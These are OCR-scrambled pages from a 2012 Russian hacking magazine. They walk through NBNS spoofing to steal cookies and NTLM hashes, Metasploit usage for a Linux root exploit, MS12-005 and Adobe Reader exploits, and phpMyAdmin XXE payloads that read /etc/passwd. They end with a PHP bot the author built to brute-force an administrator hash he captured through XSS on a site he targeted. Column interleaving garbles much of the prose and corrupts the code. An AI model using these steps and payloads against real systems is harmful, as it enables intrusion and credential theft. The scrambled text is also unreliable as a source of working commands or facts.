Теперь нам необходимо подделать ответ на NBNS-зanpoc. Для этого нужен Tгansaction

10

можем подменить какой-либо рандомный запрос. Но нам нужны

из NBNS - зanpoca . Но , как уже было

сказано выше, этот запрос чаще всего является широковещатель­

кукисы именно с ХХХ.сот, а потому мы проворачиваем неболь­

ным, а так как мы находимся в той же локалке , то никаких проблем

шой трюк- поднимаем веб-сервер со страничкой, содержащей

с его получением нет. К нашей радости, для спуфинга в

скрытый фрейм !можно заюзать JavaScгipt) , а уже в зто м фрейме

MSF уже

nрисутствует соответствующий модуль. Вот краткая схема дей­

загружаем ХХХ.сот. Однако нам надо не просто загрузить ХХХ .

ствий:

сот, но еще и сделать так, чтобы браузер не нашел его с помощью

1.

Загружаем модульдля Net BI OS-cynnингa:

use auxiliary/spoof/

2. 3.

4.

DNS

и начал использовать для поиска только

NBNS.

Очень важно ,

чтобы браузер продолжал считать просп уф ленный домен тем же

nbns/nbns_response. Выставляем регэпс ответов на запросы :

Set REGEX *google*. set spoofip xa.kep.

сам ым доменом, иначе в силу вступят кросс-доменные политики

и никаких кукисо в мы не увидим. Так как указанная методика

Указываем, какой IР-адрес подставлять:

IP.add r ess.

разресерчивалась как раз во время написания этого текста, то

Зanycкaeм: run.

единственным достойным вариантом стало обращение к н есуще­

Теперь сделаю небольшее отступление. Создатель этого моду­

Теперь м о ж но вывести общ и й алгорит м а таки :

ствующему поддомену атакуемого сайта.

ля ITiт целей

Medin) предлагал использовать его совершенно для други х lgoo.gi/Jz2Q9), а именно для банального сбора NТLМ-хешей.

1. 2.

Поднимаем wеЬ-сервер с легированием входящих запросов

!чтобы соби рать кукисы) и фреймом, ссылающимся на несуще­

Е сли точнее, то после запуска вышеуказанного модуля от браузе­

ствующий поддомен ХХХ.сот !например , asdasdasd.XXX.coт ) .

ра приходит множество запросов, п ричем чаще всего получается

спуфить короткие имена ! типа тakaka), а не длинные lтakaka. сот). С учетом логики работы Windows короткие имена причисля­ ются к зоне интранет !не интернетl). А эта зона в IE считается « до­

Устанавли ваем NВNS-сп уфи нг на все имена.

3.

Жертва, которая ввела что-то в адресную строку браузера, спу­ фится по

4.

NBNS и

спуфится по

веренной», и в ней действуют гораздо менее грозные настройки безопасности. К примеру, здесь разрешена автоматическая аутен­ тификация на сайтах. Таким образом, мы можем запустить модуль

5.

редиректится на хостхакера.

Бра узер автоматом резалвит asdasdasd.XXX.coт, и, опять же,

NBNS.

Браузер о тправляет кукисы ХХХ.сот на asdasdasd . XXX.coт, то есть на хостхаке ра.

для сбора N Т LМ-хешей по Н Т Т Р !хотя можно и по

1.

Загружаем модульдля

SMB): снифинга: use auxiliary/server/

Так им образом, мы можем получить кукисы от множества сайтов. Ед инст венн ое ограничение здесь в том, чтокукидолжны

capture/http_ntl m. 2. 3.

Страница, где будет производить ся запрос:

быть установле ны не на ко нкретный узел IХХХ . сот), а на домен

Порт, где поднимется веб-сервер :

I . ХХХ.сот) .

set URIPATH . set SRVPORT ве .

ПЕРЕХВАТИТЬ ТРАФИК НА

LOCALHOST ПОД WINDOWS

ы.r.&~tfl г.

Недавно я столкнулся с не возможностью пропускать трафик

настройки

через прокси при системных обращениях к

прокси на

-127.0 .0.1. Почему

localhost

системных? Потому, что настройки

щиеся прокси , используются большинством ПО в мер,

Python

или к л у пбзку

IE, касаю­ Windows. Напри­

при использовании uгll i b2 автоматом берет прокси

г

IE и .NET fгатеwогk запрещаюттрафику идти через localhost и 127.0.0.1 . В IE9 эту проблему удалось решить

за счет того , что в настройках можно выбрать опцию << не исполь­ зовать прокси>>-

<<-localhost».

Решение , в общем-то, чрезвычайно простое. Во - первых, можно

ОС . Надо отметить, что острее всего п роблема проявляется,

обращаться к сервису по любому

IP

когда сервис поднят именно на внутреннем интерфейсе 1127.0.0.1) и недоступен на внешнем 10.0.0.0). В тот раз мне удалось решить

например по адресу

как все они относятся к одному

ее каким-то обходным путем , но недавно я наткнулся на инте­

резолва имен hosts l % windiг%\dгiveгs\etc\hosts) другое имя для lo calhost : 127.0.0.1 localhOst .

ресный пост в благе Eldaг Maгcussen. Он написал, что дефолтные

ХАКЕР

03/158/2012

г

127.1.2.3, так

в

127

подсети, кроме первого,

интерфейсу. Во-вторых , можно nрописать в файле локального

055


Павел Александрович [iv i nsi d e .Ы o g s p ot.com[

ВЗЛОМ/ОБЗОРЭКСПЛОИТОВ

Дмитрий Михайлович

[115612, де р. К рас н ая звездо ч ка, д . 1[

Обзор эксплоитов В этом интереснейшем обзоре мы рассматри­ ваем свежую уязвимость в ядрах

Linux,

позво­

ляющую без особого труда поднять привилегии

1

Локальное повышение привипегий в Linux

CVSSV2

6.8

1111111 111 1 111 11111

11 11 1 [AV: L/AC: L/AU:S/C:C/1 :C/A:CI

l:iil'II3] Уязвимость связана с интерфейсом /ргос/<РI 0>/mem [где <PID> идентификатор нужного процессаl, который Linux предоставляет

Microsoft Office и Acrobat Reader, а также ХХЕ-инъекцию в phpMyAdmin.

для прямой запи с и в память процесса и чтения из нее. В ядре версии

Не пропусти!

до с тат о чно защищен от неавторизованного доступа с помощью

в системе, баги в

2.6.39 разработчики у брали директиву #ifdef,

исключающую прямую

запись в память процесса, поскольку сочли, что этот интерфейс уже других ме х анизмов ядра. На самом деле nисать в память процесса мож е т любой пользователь, обладающий достаточными правами.

Как оказалось, эти права проверяютсЯ не совсем корректно. В итоге пол у чило с ыо , чтополучилось:вовсехверсияхядра,начинаяс

2.6. 39, зло у мышл е нник может продвинуть по « карьерной лестнице» до рута любого имеющего с я пользователя .

056

ХАКЕР

03/158/20 12


Обзор экс пло итов

цt:J4!·Jii

int match; rcu_read_lock(); match = (ptrace_parent(task) == current); rcu_read_unlock(); i f (match && ptra ce_may_access(task, PTRACE_MODE_ATTACH)) return mm;

При открытии интерфейса / pгoc/<PID>/me m вы полня ется такой ко д :

static int mem_open( struct inode* inode, struct file * file) { file- >private_data = ( void*)(( long)current->self_exec_id); file- >f_mode 1= FМODE_UNSIGNED_OFFSET; return е ;·

mmput(mm); return ERR_PTR(-EPERM) ;

Стало бы ть , на открытие нет никаких ограни ч е н ий - любой может это сде лать. Одн ако н а за пись и чтение некоторые ограничения вс ё­ таки уста н овлены. Обратимся к коду функции, которая осущест вля­

ет запис ь lприведена тол ьк о н аиболее важная часть функции):

Чтобы за пи сь пр ошла успешно, ее должен осуществлять либо сам

п роцесс ltask == сuггепtl, либо родитель , трассирующий этот про­

static ssize_t mem_write( struct file * file, const char user * buf, size_t count, loff_t * ppos )

цесс через рtгасе . Ра зличные трюки с рtгасе не увенчались успехом,

позтому рассмотрим вариант с task

== сuггепt. Чт о если процесс сам

за пишет н уж ные нам данны е себе в память? Очевидно, что н ас в п ер­

вую очередь интересуют процессы с атрибутом

! * ... *! struct task_struct * task = get_proc_task( file- >f_path.dentry- >d_inode);

/ * .. . *!

" уеееее

su: us er

mm = check_mem_permission(task); copied = PTR_ERR(mm); i f (IS_ERR(mm)) goto out_free;

!*

$ su

suid . Ра ссмо т рим su:

haw I am а cowboy" haw I am а cowboy doe s not exist

уеееее

Л егко заметить, что н а stdeгг выдается с тро ка, соз данная с нашим

участием. Казалось бы, мы можем о ткрыть /pгoc/< PID >/ mem , с п омощью lseeki) найти нужное место в памяти , с помощью dup211 связать стандартный поток ошибок и файловый дескриптор откры­

*/ i f ( file- >privat e_data != ( void *)( ( long) current->self_exec_id)) goto out_mm;

того / pг oc/< PID>/mem, записать нужные данные, а за т ем исполнить шелл-код . Однако не всё так просто. Здесь выполняется вторая про­ верка , в ходе которой текущее значение

self_exec _ id с равнива ется

со значением, с пом о щью которого был соз дан файловый де скри п ­

1* .. . * !

тор / pгoc /< PID>/mem. Значение self_exec_ id инкреме нтир уется при Здесь проводятся две проверкидля предотвращения неавтори­ эованной записи: check_mem_peгmission и

каждом запуске пр о ц есса, поэтому мы не можем п олучи тьд оступ к

self_exec_id. Функция check_mem_pe гmission является простой обер т кой для __ check_

Тем не менее, эту проверку можно обойти : с помощью foгkll мы созда­

памяти вышеизложенным способом.

mem_peгmission, вот ч т о она делает:

ем потомка и вн у три него с помощью execll с т артуем новый процесс.

static struct mm_struct * __ check_mem_permission( struct tas k_str uct * task )

значению у предка . Когда мы за п ускаем execll, sel f_exec_id увеличи­

Наш форкнутый пр о ц есс имеет значе ни е

self_exec_id , равное ее

вается на еди ниц у. В нашем пото мке мы открываем па мя ть пр е д ка и

создаем файловый д ескриптор для /pгoc/<P ID пр е д ка>/mе m , благо

struct mm_st ruct *mm;

на о т крытие нет провер ок. В предке т ем временем за п ускаем

su

ч ерез execl l, таким образом урав н ивая значения self_exec_id. Д алее

mm = get_task_mm(task); i f (!mm) return ERR_PTR(-EINVAL );

с помощью, как выразился сам соз да те ль экс плоита , <<о чень черной

магии со кетов юн икс» п е р е даем предк уо ткрытый файловый д е ­ скриптор от п отомка и возвращаемсяк вышеупомянутому сценарию

i f ( task

current) return mm;

dup2 -> ехес. Осталось понять, по какому адресу делать запись. По идее,

i f (task_is_stopped_or_traced(task)) {

ASLR

должен затруднить нашу за д а ч у, однако взгляни на это:

$ readelf -h / bin /s u 1 grep

Туре

Туре:

file)

ЕХЕС

(ExecutaЬle

Выв од нам как бы нам екает, что программа

su использует с татич е­

ский а др ес сек ции .text !в ином случае был бы тип DYN, а не Е Х ЕС) . Это означает, что

su в большинстве дистрибутивов скомпи лиров ана Pl Е , с ледовательно, ASLR для секции .text ра бо­

без использования

тать не будет, что у проща ет написание эксплоита.

И схо дный ко д эксплоита Mempodippeг д осту пен на exgloit-db .com , EDB-10 18411 . Пр име р е г о использования представлен на ск р и нш о­ те.

it·!;lдJti Liпu x

>=2.6.39, 32-

и 64-битные.

~i•J!Iiii•HI Д оверьобновлениеядрасвоемупакетномумене д жеруилиустанови Примерработыэксплоита

ХАКЕР ОЗ

/158/ 2012

Mempodipper

патч вручную.

057


ВЗЛОМ/ОБЗОРЭКСПЛОИТОВ

2

MS12-005 Уязвимость процесса сборки

следавательности действий, требуемых для запуска встроенного

·

СliсkОnсе-приложения с полными правами доступа IFull Tгustl. В результатевыполнения описанных выше действий на экране

~3

CVSSV2

111111 111 111 11 11 1

появится ряд диалоговых окон. Однако пользователю не нужно

111 11

ничего с ними делать .

[AV N/AC M /дu .N /C C/I.C/AC)

Custom Animation'ы выполняются, когда

PoweгPoint работает в ре ж и м е показа слайдов. Когда PoweгPoint на­

[]IШ

ходится в полноэкранном режиме, после выполнения каждогодей­

Найденная9язвимостьпозволяетвыполнитьпроизвольныйкодна

ствия анимации происходит восстановление фокуса. После запус~а

удаленной системесправами текущего пользователя. Для этого

СliсkОnсе-приложения мы можем посылать сообщения диалоговым

пользователь уязвимой системы должен зайти на специально сфор­

окнам, чтобы закрыть их.

мированную wеЬ-страницу или открыть злонамеренный файл

Office.

Уязвимость присутствует в механизме безопасности

lj:JЦ!•Jii

Дело в том, что

Уязвимость, описанная в

Object Packageг. Object Packageг считает ClickOnce-фaйл безопасным, благодаря чему файл такого типа можно внедрить в документ Office. Когда пользователь уязвимой системы открывает документ, внедрен­

MS12-005, затрагивает два аспекта: 1. Метод определения исполняемого файла. Непропатченный packager.dll определяет, является ли файл испол­

ный файл автоматически выполняется . Напомню, что

няемым, сопоставляя расширения файлов с элементами таблицы

ClickOnce- это

!для удобства назовем ее ехесЕхtТаЫе).

технология развертывания, позволяющая создавать самообновляе­ мые приложения

Windows,

которые могутустанавливаться и запу­

.text:02FA1098 execExtTaЬle dd offset а_ехе ; DATA XREF: CPack age: :_GetCurrentlcon(~I C ~ )~69 1 о .text:02FA1D98 ; CPackaEe: :_Giv ewarni n gMsg { НWND__ * ) +5Е \ о .text:02FA1D98 ; " .ех е ~ .text:e2FA1D9C dd offset а - com ; " . сот -' .text:e2FA1Dдe dd offset а bat ~ " .bat" . text:02FA1DA4 dd offset а lnk " . ln k" .text :e2FA1DA8 dd offset а - cmd " .cmd" " . pif" .text:e2FA1DAC dd offset a_pif .text:e2FA1DB0 dd offset а - scr " . scr" .text:e2FA1DB4 dd offset а _js ; ". js " .text:e2 FA1DB8 dd offset а _jse ; ". j :se " . text:e2FA1DBC dd offset a_vbs _; ". vbs" . text: e2FA10Ce dd offset а - vbe ; ". vbe" .text:e2 FA1DC4 dd offset a_wsh ; " .wsh" .text:e2 FA1DC8 dd offset a_sct ~ " . stt ' .text:e2 FA1DCC dd offset a_vb _; " .vb" .text:e2FA1DD0 dd offset a_wsc ; " .wsc '~'~

скаться при минимальном вмешательстве пользователя . Существует три способа публикации приложения

ClickOnce: с веб-страницы,

общего сетевого ресурса или носителя, например ком па кт-диска . Его можно установить на компьютер конечного пользователя и запустить локально, даже если компьютер не подключен к сети, или запустить

в оперативном режиме, без установки каких-либо компонентов на

компьютер конечного пользователя. При этом приложения

ClickOnce

могутобновляться самостоятельно, проверяя наличиедоступных новых версий и автоматически заменяя все обновленные файлы. Для реализации атаки в данном случае используем специальным

образом сформированный файл презентации PoweгPoint. Эта про­

грамма позволяет назначить Custom Animation'ы для ОLЕ-пакетов . В отличие от обычных анимаций, мы можем задатьдве специфичные

для OLE анимации [которые называются Object Actions): Activate

Contents [активировать содержимое) и Edit Package [редактировать пакет). При Activate Contents выполняются те же действия, что и при двойном щелчке пользователя по встроенному объекту. Таким

образом,

Custom Animation'ы позволяют выполнять указанные по-

I!IEIEI

~ C:\Python27\python.exe О&мен

nакетами

Ответ Ответ Ответ

от

: ответ

от ОТ

от

с

lb.wo~dp~e ss .com

72.233.69.6: 72.233.69.6: 72.233.69.6: 72.233.69.6:

ЧИСЛО ЧИСЛО ЧИСЛО ЧИСЛО

[72.233.69.6] no 32

& а ~т = 32 &а~т = 32 &а~т = 32 &а~ т =32

В ре 1·1Я вреt·1Я вреt·1Я вреt·1Я

~татистика Ping nля 72.233.69.6: Пакетов: отnравлено = 4, nолучено Приблизительное время nриема - nереnачи

4,

1

1

Минимальное

=2 40t·1C =166t1c =168t·1C =166t1C

в

а

&а~т:

ТТL = 127 ТТL = 127 ТТL = 127 ТТL = 127

nот е ряно

= 0 (0%

nотерь),

мс :

= 166мсек, Максимальное = 240 м с ек, Ср е nне е = 185 м сек

C:,tmp)nslookup exploitshop.wo~dp~ess.com Can' t f ind se1•ve1' nате fo1• add1•ess 192 .168. 0. 2: Non - e x i ste n t domain ~e~ve~: google - puhlic - dns - a.google.com rdd~ess: 8.8.8.8

1***

~on-autho~itative answe~: ~ame: lb.wo~dp~ess.com ~dd~esses: 74.200.243.251, 1

72.233.2.58, 72.233.69.6, 76.74.254.120 76.74.254.123, 74.200.244.59

rliases:

exploitshop.wo~dp~ess. c om

C:,tm

>

Ре зу льтат эксплуатацииуязви мости- запущенный

058

Python- скри пт

ХАКЕР

03/1 58/2012


Обзор эксплоитов

.text:e2FA1DD4 dd offset a_wsf .text:e2FA1DD8 dd offset a_wmz

pdf-~rser.py -о 1В

".wsf" " .wmz "

"sr .pdr -r

Просто прокручиваем в цикле этутаблицу и смотрим, имеет ли встроенный файл такое же расширение, как и элементтаблицы. Д ля этого используется функция l s P гogiOinlist:

push llh ; int dangerousTaЬle push offset execExtTaЬle .text:e2FA72FB push es i ; pExtName .text:e2FA72FC push е ; int . text: e2FA72FE call ?I sProgiDinl ist@@YGHPBG0PBQBGI@Z Is ProgiDinlist(ushort const * ,ushort co nst * , ; ushort const * const * ,uint) .text:e2 F AПF4 .text:e2FA72Fб

Нюанс состоит в том, что в таблице приведена лишь часть существующих расширений для исполняемых файлов. В качестве примера можно взять ру или

pl. MS12-005 обходитэту проблемус по­

мощью функции AssoclsDangeгousl l , ко т орая проверяет расширения исполняемых файлов:

. text:e2FA6All push еах .text:e2FA6A12 call ds: __ imp__ AssocisDangerous@4 ; Assoc isDangerous(x) .text:e2FA6A18 test еах, еах . text:e2FA6Alд jnz short loc_2FA6A42

Вр е доно с но е с одер ж и м о е 3D -о б ъекта в т е ле рdl - ф ай ла

А- имя , под которым должна быть активирована аннотация . РО- аннотация должна активироваться, как только открывает­ ся страница, содержащая аннотацию на 3 D -данные.

lj:JЦ!e]ii Последовательностьзапу с ка объектов :

2. Вывод предупре ж дени й системы бе з опасности пользователю . packager.dll выдает предупреждения, только если файл является исполняемым. Н о рассмотрим функцию CPackage __ _ GiveWaгningMsgi H WND hWndl . Она вновь проходит по табли ц е

Объект 4 - действие OpenAction инициирует обращение к JavaScript. Объект 14-JavaScгipt ссылается на объект 15. Объект 15- J avaScгipt-кoд применяеттехнику heap spraying,

ехесЕхtТаЫе, и, если расширение встроенного файла не содержится

затем переходит на вторую страницу.

в ехесЕхtТаЫе, никаких предупреждений не выдается.

Объект 11-определение 3D-данных и описание их форматирова­

Пропатченный

ния.

Объект 1О - 3D-данные, которые будут показываться !вероятно, поврежденные!.

it·1;ldfjfi Windows ХР, Windows Vista, Windows Sегvег 2008 SP2, Windows 7.

fi•J!Iij[•J:I

Объект ы, н а которыеследуетобратить внима н ие :

Объект 1О -ссылается на именованные словари I/3D, /U3DI. Объект 11- ссылается на именованные словари I/3DI, /3DD, / 3D,

Существует обновление, устраняющее эту уязвимость.

/ 3DAI.

3

Уязвимость в Adobe UЗD-данных

Reader при обработке

CVSSV2

10.0

11111 11 11 111 11 111111

111 1 IAV: N/АС: L/Au: N/ С: С/1: С/А: С)

1ШIШ

Уязвимость вызвана ошибкой при обработке U 3D-данных. Такая ошибка может привести к сбою. П ри ус п ешной эксплуатации эта уязвимость позволяет злоумышлен ни ка м установить полный контроль надсистем ой. Для обхода

DEP используется RОР-цепочка, icucnv36 .dll. Для обхода ASLR выполняет­ ся JavaScгipt-кoд, реализующий технику heap spraying. основанная на библиотеке

Кратко опишем U3D-компоненты, чтобы лучше пони мать, какие из них используетсплоит:

Объект 15 - содержит JаvаSсгiрt-коддля реализации heap spraying и перенаправления на вторую страницу !инициирует

процесс отображения 3D-данных ! . Сплоит реализован в Metasploit lпример с полезной нагрузкой в виде запуска калькулятора):

msf > use explo i t/windows/fileformat/adobe_reader_uЗd msf e x plo i t(adobe_reader_uЗd) > set pay l oad win dows/exec payload => windows/exec msf e x p l o it (adobe_ reader_uЗd) > set cmd calc . exe cmd => calc . exe msf ex p l oit ( adob e_ r eader_uЗd ) > show options Module options (exploit/windows/ fi leformat/adobe_reader_uЗd): Name Cu r rent Setting Required Descr i ption

U3D- на текущий момент единственный п оддерживаемый под­ тип и 3D - объект.

F I L ENAМE

3DD lнеобходимl - определяе т поток или словарь с 3D-данными,

OBFUSCATE

3DA lнеобязателенl - словарьактивации, определяющий время,

msf.pdf false

yes по

The file name Е nаЫе JS obfuscation

подлежащими рендерингу.

когда следует показывать 3D-данные .

Payload options (windows/exec): Name Current Setting Requ i red

Description

3D I Iнеобязателенl - п еременная логического т ипа, определяю­ щая основной режим использования . Значение tгue соответствует интерактивному режиму,

DIS lнеобязателенl- имя, определяющее состояние 3D-данных придеактивации.

ХАКЕР ОЗ/ 1 5 8/ 2 01 2

CMD

calc.exe

yes

EXITFUNC

process

yes

false- взаимодействию через JavaScript.

The comma nd string to execute Exit tec hni que: seh,thread,process,none

059


ВЗЛОМ/ОБЗОРЭКСПЛОИТОВ

Explpit target: Id Name е

<!ELEMENT foo ANY > <!ENTITY bar SYSTEM "file: /// etc / passwd" >

Adobe Reader 9.4.0 / 9.4.5 / 9.4.6

оп

Win

ХР SРЗ

msf exploit(adobe_reader_uЗd) > exploit [*] Creating 'msf.pdf' file .. . [+]

msf.pd~

> <foo>&bar;</foo>

stored at /home/pikofarad/.msf4/local/msf.pdf Здесь оnределяется nримитив Ьаг, который ссылается на файл /et€/

i'·'.J1Jfi

passwd, и nри обработкедокумента его содержимое включается

Adobe Read eг 9.4.0 19.4.5 19.4.6 под Windows ХР SP3.

в него. Кстати говоря, в ХМL-документ можно не только включать

локальные и удаленные файлы.

,_i,J!Iiii•J:I

В нем можно запускать исполняемые файлы, если парсеру раз­

решено это делать . По стандарту это выглядит nримерно так :

Существует обновление, устраняющее эту уязвимость.

'

c?xml version= "1.0 " encoding= "utf-8" ?> < ! DОСТУРЕ foo

LFI в phpMyAdmin через ХХЕ-инъекцию

[

CVSSV2

<! ELEMENT foo ANY> <!NOTATION GIF SYSTEM "http: // my-cool-site.com/ ShowGif.exe" > с! ЕNПТУ bar SYSTEM "http ://not-my-cool-site.com/ bar.gif" NDATA GIF >

5.0

111111 111 111 111 11111

111 [AV:N/АС: L/Au :N/C : Р/1 :N/A:N 1

[DШ В начале года исследователь Магсо Batista опубликовал весьма интереснуюуяз вимо с тьтипа Loca l File lncluding. Эксnлуатируется

она нетривиально, через ХХ Е-инъекцию [ХХЕ -ХМ L eXteгnal Entity],

> cfoo>&bar; c/foo >

которая представляетсобой разновидность ХМ L-инъекции .

Напомню , что nри nомощи ХМL-инъекции [например, GЕТ­

В этом документе с п омо щью программы ShowGif.exe обрабатыва­

запроса к веб-серверу] можно изменить содержимое ХМL­

ется рисунок baг.gif. В некоторых случаях мы можем внедрить nо­

документа. Обычно интерес представляютфайлы базы данных

добную конструкцию через ХМ L-и нъекцию и выполнить требуемый

xmiOB, гд е содержится информация о пользователя х:

код. Более подробная ин фа об ХМ L-инъекциях есть на сайте OWASP

[goo.gi/BBG9C ]. c?xm l version= "l . e" encoding= "IS0-8859-1" ?> cusers > cuser > cusername> gandalf c/username> <password> !cЗ </password>

cuserid >0</user id > cmai l> gandalf@middleearth.com< /mail> </user>

lj:J4!•Jij В phpMyAdmin имеется функция имnорта базы данны х из заданного пользователем ХМ L-фа йла. Уязвимос ть заключается в том, что по­ сле загрузки специально сформированного ХМL-документа атаку­

ющий получает возможность [ограниченную nравами веб - сервера] прочит ать nрои зво льный файл в системе или локальной сети.

Уязвимос ть на хо дится в файле l ibгaгies\impoгt\x m l .php, где функция simplexml_load_stгing[] вызывается без проверки на су ще­

<user> cu sername> Stefane c/ username> cpa ssword> wlsЗc </password>

cuser id >500 </userid> cmail >Stefane@whysec . hmm </mail> </user>

ствование ссылки на внешний примитив:

$xml = simplexml_load_string($buffer, "SimpleXMLElement"J LIBXML_COMPACТ); Патченные версии phpMyAdmin для предотвращения инъекции

используют функцию l ibxml _disaЫe_e ntity_loadeг[], прежде чем за­

<user >

гружать ХМ L-документ.

Компания SECFORCE разработала модуль к Metasploitдля экс­

< usernaшe> tony </username> <passwor d > UnбR34kЬ!e </ password >

cuserid> 500 </userid> cmail> s4tan@hell . com</mail> c/user> </ users >

плуатацииэтойуязвимости.ОнавтоматизируетnроцессLFiследую­ щи м образом:

1.

Логинится в phpMyAdmin с помощью предоставленных реквизи­ тов.

2.

СоздаетХМL-документ, применяя ХХЕ-инъекции для заданного файла.

Смышленый читатель без труда nроведет аналогию с SQLинъекциями, а я тем временем nерейду непосредственно к инъек­

3. 4.

Загружаетфайл сХМL-документом .

Пол у чаетуказанный файл с серве ра.

циям подтипа ХХЕ . В док ументах ХМ L существуюттак называемые

примитивы [entities], которые объявляются в начале док уме нта в об­

Возможные оnции эксnлоита и nример успешной эксплуатации по ­

ласти ОТО. Существует несколько видов при м итивов, но сейчас нас

казаны на скриншоте.

интересуюттолько внешние [e xteгnal entities]. Если в определении примитива присутствует URI, то он называет с я внешним. Соответ­ ственно, парсер должен получитьдоступ к этому URI и включить его со держимое в документ, если это было задано, например, так:

c?xml version= "1.0" encoding= "utf-8" ?> < !DOCTYPE foo

060

if.1;Jдjfi PhpMyAdmin 3.4.х

вnлоть до 3.4.7. 1 и 3.3.х вплоть до 3.3. 10.5.

f'·'••••t·'a

Обновиться минимум до вер сии phpMyAdmin 3.4.7. 1 [3 .3.1 0.5] или

установи ть соо тветствующий патч . ::х::

ХАКЕР

03/158/2012


взлом

lqbzllhttp ://essenzo.netl ·

ows КОДИМ БОТА_АЛЯ РАСПРЕДЕЛЕННЫХ ВЫЧИСЛЕНИИ Существует огромное количество bjt.ly/WdbrO -

языков программирования.

cлoвapи для брута

Кто-то выбрал для себя С, кто­ то-

ASM,

а кто-то-

Python.

Я,

например, отдал предпочтение

от Античата;

ш~ один из консольных

брутеров;

www.l2ko.de кoнвepтep батников.

не самому экзотическому

языку- РНР. А всё потому, что мне чаще приходится

На нашем диске ты сможешь найти

работать с вебом, чем

все необходимые

с десктопом. Но бывают и такие

файлы и исходники, описанные в статье.

моменты, когда тебе нужен специализированный софт, а его просто-напросто нет.

00 U SPEAK ENGLISH? NO,

РНР

Однажды. во время очередных ковыряний очередной

XSS,

ко мне

в лаги попал хеш па рол я администратора нужного мне ресурса. Ко­ нечно же, его необходимо было расшифровать, и я сразу обратился к различным онлайн-сервисам, помогающим с расшифровкой. Ни один из них мне не помог. С этой душевной печалью я отправился на ха к-форумы, где

в специальных разделах оставил просьбу о помощи в расшифров­ ке. Но и там меня ожидал фейл. Однако сайтик был весь из себя расчудесный, и бросать его админку мне совсем не хотелось. Заварив очередную кружку кофе, я начал думать, как поступить. Брутить на своей машине не получилось бы- процессор слабоват. Значит, нужно было где-то взять компьютер с хорошими характе­

ристиками, и желательно не один. Покупать себе домой

20

новых

мощных серваков ради расшифровки одного хеша как-то не входи­ ло в мои планы. Поэтому я купил несколько выделенных серверов для распределения вычислений у одного хостера. Осталось всего ничего- настроить расшифровку. И вот тут я решил углубиться

062

ХАКЕР

03/158/2012


РНР-бот для

Windows

Комnилим бот

в процесс. А n о чему бы не написать бота, пр и н им ающего команду

function mySettings()

на расшифровку хеш а с общего сервера? М ож н о б ыло и написать,

{

только вот проблема заключалась в том, что я з н ал только скрипто­

$settings = file_get_contents( 'http://adres.com/?do=mysettings' ); if ($settings != '' )

вые языки, а с десктопом никогда не имел де л а . И тут в моей памя­ ти всплыла такая вещь, как всевозм о жные р hр 2 е х е-компиляторы.

{ ОБЩАЯ СХЕМА

list($status, $statusdata) explode( ' 1' , $settings, 2 ); $config = array ( 'status' => $status, 'data' => $statusdata); return $config;

Бота я решил заставить действовать по вполне определенному плану. Итак , существует сервер, на к о торый добавляются << За­ дания » . Боты отстукивают на него каждые пять минут, проверяя, не появилось ли для них новое задание.

И если появилось, посылают серверу сигнал о том, что б рут

начался. Сервер, в свою очередь , добавляет в базу запись о том,

else return false;

кто работает, а кто- нет. После завершения Брута бот отправляе т серверу запрос с уведомлением, что работа окончена. Этот запрос

также может содержать расшифровку. При этом нужно сделать так, Эта ф у н к ция обращается к нашему гейту, ловит ответ, и, если

чтобы боты использовали разные словари для брутфор са , так как брутить один и тот же словарь много раз просто не имеет смысла. Также след��ет учесть, что хеш ей может быть много, поэтому мы

он не п у ст ой , делит его на две части там, где есть символ

1.

Первая

часть представляет собой команду для бота, а вторая- допол­

не станем гонять весь словарь через брутфорс для каждого из них.

нительные данные для этой команды. Теперь напишем функцию

В процессе б рута мы будем сразу же сверять результаты со все-

брутфорса на основе заданных в виде аргумента хешей [массив) :

ми хешами, которые нужно расшифровать. Вообще, скрипт будет иметь всего несколько функций и выступит, так сказать, в качестве

function bruteHashes($hashes)

обертки [шедулера), << дергающей>> уже сам брутфорсер. Именно

{

поэтому нам нужно выбрать такой брутфорсер, который работает

/1 Сохраняем хеыи для брутера file_put_contents( './brute.txt' , implode( "\r\n" , $hashes));

через консоль, так как далее мы переведем скрипт вехе, который тоже работает в консольной среде. Я использовал наработку моего знакомого- она имеет такой синтаксис:

mdS.exe

{файл хешей} {файл словаря} {где сохранять}

Здесь первый параметр-это название файла с хешами для

брутфорса [один хеш= одна строка), второй параметр-название

// Говорим серверу, что мы уже работаем file_get_contents( 'http://adres.master .servera.com/?do=iamworking' ); /1 Брутим passthru( 'mdS.exe brute.txt vocabulary.txt results.txt' );

файла со словарем, а последний параметр-название файла, в который брутер будет записывать результаты . Задачи серве­ ра- правильно установить бота, периодически чистить рабочую

Сохраняем резу

$uploader

ьтат

на

сервере

no

Ф

r

= ftp_connect( 'ftp://adres.master.servera.com' );

папку, а также подавать сигналы о том, что пора бы уже начать б рут по таким-то хешам. Для начала напишем функцию обращения к серверу для получения текущего задания:

ХАКЕР

03 /158/2 012

ftp_login($uploader, 'login' , 'password' ); ftp_put($uploader, './results/' .time(). ' .txt' ,

063


взлом -

'./results.txt' , FTP_ASCII);

Q

&~~

ftp_close($uploader); //

Говорим серверу,

-

-

Bat Т о Ехе Converter v1. 5

~(g] r8J

'~============~==============~l c=J c=J

~~'

.....-........

L __ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _

-~

что мы закончили

0---

file_get_coпteпts(

Visblty

'http://adres.•aster.servera.com/?do=iamfinished' ); }

\VorЬ-Iodir~tory

@ anontdirodory о т..._...,-

о---

Итак, функция берет в качестве аргумента массив с хе шами

ЕлаурЬоn

и сохраняет его в удобоваримом для брутера формате, то есть

0Et><тn>tlheor<I!J'10'

·-l

в виде текстового файла, в каждой строке которого находится один хеш. Затем бот стучит на сервер с сигналом о том, что начал

работать. Это нужно для того, чтобы сер вер не записывал бота в <<мерт вые >> машины, если он не будет отстукивать каждые пять

0 Addv.sta _ _ _

минут !тайм-аут по умолчанию), и помнил , что бот функционирует.

0 Adddeaщ>ieo'

Далее заводим самого бота, указав ему созданный файл хе ш ей,

Oo..r.nte-Res

установленный словарь и файл для сохранения результатов . Соз­

P.w~ter:

даем также функцию <<ус тановки >> бота. Установка представляет собой скачивание и последующее сохранение словаря, по которо­

С-'<

му нужно брутить: fuпctioп iпstallVocab{)

....t

11

Exit

11

Компилим батник дпя скрытного запуска брутера

{

$vocabulary = file_get_coпteпts( 'http://adres.com/unique_vocabulary.php' ); file_put_coпteпts( './vocabulary.txt' , $vocabulary);

и снова запускаем шедулер. Нужно учесть, что файл словаря не­

обходим уже при первом обращении к серверу, поэтому сделаем предохранитель, который подготавли вает словар ь и запускает шедулер :

Серверный с крипт, к которому обращается бот, должен воз­

